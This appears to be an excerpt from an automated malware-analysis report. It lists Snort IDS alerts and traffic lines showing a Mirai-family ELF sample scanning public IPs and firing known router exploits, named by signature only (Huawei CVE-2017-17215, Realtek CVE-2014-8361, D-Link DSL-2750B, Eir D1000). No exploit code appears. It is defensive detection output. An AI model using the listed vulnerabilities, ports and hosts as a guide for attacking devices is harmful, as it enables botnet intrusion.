            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:56204 -> 68.183.20.55:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:56204 -> 68.183.20.55:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54136 -> 168.181.187.254:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:54136 -> 168.181.187.254:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59730 -> 54.191.47.175:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:59730 -> 54.191.47.175:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49996 -> 156.234.29.107:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:49996 -> 156.234.29.107:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51614 -> 85.214.139.144:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42676 -> 85.214.152.130:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40076 -> 85.214.64.109:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42650 -> 85.222.146.19:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36188 -> 85.214.153.87:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60748 -> 85.214.72.203:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47624 -> 84.33.211.22:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59352 -> 171.241.31.136:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35770 -> 84.137.62.241:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50144 -> 84.247.164.45:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58760 -> 206.53.53.125:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54244 -> 206.189.127.10:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41056 -> 213.239.228.165:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51004 -> 213.188.195.184:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42622 -> 84.228.228.161:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53244 -> 88.133.227.164:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42222 -> 213.94.201.71:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41256 -> 95.211.106.45:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35622 -> 213.152.85.155:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58532 -> 88.221.47.153:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39794 -> 206.72.5.249:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38478 -> 95.173.185.252:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36082 -> 95.9.192.97:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45970 -> 206.119.66.237:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36532 -> 206.109.178.145:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49782 -> 95.31.35.40:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:32828 -> 200.61.47.203:80
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45880 -> 138.68.139.152:80
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34752 -> 197.148.72.51:80
            Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46196 -> 84.7.151.16:52869
            Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46206 -> 84.7.151.16:52869
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45210 -> 52.40.241.151:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60716 -> 68.189.6.131:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54454 -> 176.113.103.194:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49864 -> 162.83.143.188:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50206 -> 70.97.199.50:80
            Source: TrafficSnort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44594 -> 14.67.78.237:7547
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41918 -> 23.27.89.184:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:56212 -> 2.19.40.247:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34012 -> 2.19.151.135:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35808 -> 95.101.246.60:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56870 -> 88.99.172.100:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52868 -> 88.99.164.3:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42304 -> 95.217.4.156:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52272 -> 95.175.123.84:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54456 -> 95.65.83.186:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37650 -> 210.129.51.32:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41452 -> 95.107.208.180:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50146 -> 95.183.37.89:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48756 -> 88.199.88.138:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:32892 -> 95.86.86.129:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56230 -> 95.9.77.59:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37120 -> 2.132.96.99:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44262 -> 2.134.160.166:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40702 -> 61.6.200.142:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56402 -> 95.188.129.155:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54030 -> 88.198.127.141:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57872 -> 88.250.162.180:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38134 -> 95.101.41.237:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51662 -> 83.166.146.209:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51764 -> 164.92.217.198:80
            Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40572 -> 164.138.115.152:52869
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58878 -> 164.39.153.82:80
            Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40582 -> 164.138.115.152:52869
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57258 -> 164.138.119.206:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33058 -> 200.61.47.203:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50958 -> 164.46.51.44:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43136 -> 164.155.111.48:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47272 -> 164.46.58.171:80
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39108 -> 156.254.104.189:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34038 -> 95.100.176.55:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55308 -> 95.110.147.138:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58636 -> 95.86.88.27:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35948 -> 95.216.194.163:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51838 -> 95.168.225.76:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57048 -> 95.80.93.168:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53750 -> 95.213.237.24:80
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47082 -> 23.65.228.84:80
            Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55776 -> 171.245.102.223:52869
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34622 -> 213.76.131.105:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59990 -> 213.14.255.224:80
            Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55778 -> 171.245.102.223:52869
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37570 -> 156.67.251.180:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57604 -> 213.176.83.61:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37300 -> 181.214.94.68:80
            Source: TrafficSnort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:43026 -> 189.111.98.238:7547
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34794 -> 104.69.27.122:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58548 -> 181.212.129.40:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36070 -> 95.105.184.249:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44816 -> 95.209.205.155:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52610 -> 95.101.191.7:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48582 -> 95.248.209.245:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35482 -> 95.59.128.242:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39400 -> 95.56.225.177:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51968 -> 42.200.190.182:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45282 -> 95.101.60.174:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39624 -> 122.155.165.121:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34560 -> 122.135.83.30:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55986 -> 181.63.252.49:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:56410 -> 122.116.201.165:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43444 -> 178.239.73.26:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42144 -> 178.239.171.173:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33196 -> 178.248.200.118:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60302 -> 206.189.61.241:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37470 -> 178.115.247.17:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46152 -> 178.217.249.154:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36860 -> 178.91.185.31:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33412 -> 49.12.56.70:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:33412 -> 49.12.56.70:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53580 -> 95.100.83.167:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49030 -> 95.154.201.17:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56096 -> 95.100.202.200:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37526 -> 95.208.230.54:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38786 -> 95.142.172.242:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44988 -> 95.216.53.110:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44822 -> 95.213.158.106:80
            Source: unknownNetwork traffic detected: HTTP traffic on port 43184 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 51346 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 51346
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 50396 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54360 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 56284 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 56284
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 59968 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 55998 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 55998
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 58804 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 58804
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 58804
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 58830
            Source: unknownNetwork traffic detected: HTTP traffic on port 50530 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 53048 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 50128
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 55490 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 41202 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 49972
            Source: unknownNetwork traffic detected: HTTP traffic on port 54768 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 7547 -> 54768
            Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 40572 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 40582 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 55776 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 55778 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43026 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 47714 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41250 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 41250
            Source: unknownNetwork traffic detected: HTTP traffic on port 54112 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 54114 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 38180 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 51244 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 38356 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 38830 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 44328 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 57030 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 44594 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46998 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57030 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 57030 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46386 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 46206 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 46196 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46386 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57030 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 41150 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48736 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 42214 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56812 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 58652 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 36936 -> 60001
            Source: unknownNetwork traffic detected: HTTP traffic on port 32818 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 32818 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 57460 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 57460
            Source: unknownNetwork traffic detected: HTTP traffic on port 48736 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 32818 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60244 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 7547
            Source: unknownNetwork traffic detected: HTTP traffic on port 48466 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 48474 -> 52869
            Source: unknownNetwork traffic detected: HTTP traffic on port 32818 -> 52869
